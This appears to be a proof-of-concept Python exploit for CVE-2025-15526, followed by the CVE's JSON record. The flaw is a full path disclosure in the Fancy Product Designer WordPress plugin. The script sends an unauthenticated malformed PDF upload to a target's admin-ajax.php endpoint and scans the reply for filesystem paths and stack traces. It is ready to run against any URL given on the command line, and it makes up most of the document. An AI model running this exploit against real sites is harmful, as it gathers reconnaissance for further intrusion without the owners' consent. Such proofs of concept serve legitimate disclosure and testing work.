CVE-2025-15526

import requests import sys def exploit_cve_2025_15526(target_url): """ CVE-2025-15526 PoC - Fancy Product Designer Full Path Disclosure This PoC demonstrates how to trigger the path disclosure vulnerability by sending a malformed PDF upload request. """ # Target WordPress site URL target = target_url.rstrip('/') # Endpoint for PDF upload (typical Fancy Product Designer AJAX handler) upload_endpoint = f"{target}/wp-admin/admin-ajax.php" # Prepare malicious file upload request files = { 'action': 'fpd_admin_ajax', 'sub_action': 'upload_product_pdf', 'product_pdf': ('malformed.pdf', b'%PDF-1.4\n%garbage\n/invalid /stream', 'application/pdf') } data = { 'sub_action': 'upload_product_pdf' } print(f"[*] Sending malicious PDF upload request to {upload_endpoint}") try: # Send POST request without authentication response = requests.post(upload_endpoint, files=files, data=data, timeout=30) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body:\n{response.text}") # Check for path disclosure indicators path_indicators = ['/var/www/', '/home/', '/usr/local/', '/opt/', 'Stack trace', 'wp-content'] for indicator in path_indicators: if indicator in response.text: print(f"[!] Path disclosure detected: Found '{indicator}' in response") return True print("[*] No obvious path disclosure detected (may need manual inspection)") return False except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) exploit_cve_2025_15526(sys.argv[1])

{"cve": {"id": "CVE-2025-15526", "sourceIdentifier": "[email protected]", "published": "2026-01-16T05:16:13.130", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fancy Product Designer plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 6.4.8. This is due to improper error handling in the PDF upload functionality that exposes server filesystem paths and stack traces in error messages. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website."}, {"lang": "es", "value": "El plugin Fancy Product Designer para WordPress es vulnerable a la Divulgación de Ruta Completa en todas las versiones hasta, e incluyendo, la 6.4.8. Esto se debe a un manejo inadecuado de errores en la funcionalidad de carga de PDF que expone rutas del sistema de archivos del servidor y rastros de pila en los mensajes de error. Esto hace posible que atacantes no autenticados recuperen la ruta completa de la aplicación web, lo cual puede ser usado para ayudar a otros ataques. La información mostrada no es útil por sí misma, y requiere que otra vulnerabilidad esté presente para causar daño a un sitio web afectado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "references": [{"url": "https://support.fancyproductdesigner.com/support/discussions/topics/13000036024", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9b39b4ce-3885-4ea4-8cf0-84e66e7f6a12?source=cve", "source": "[email protected]"}]}}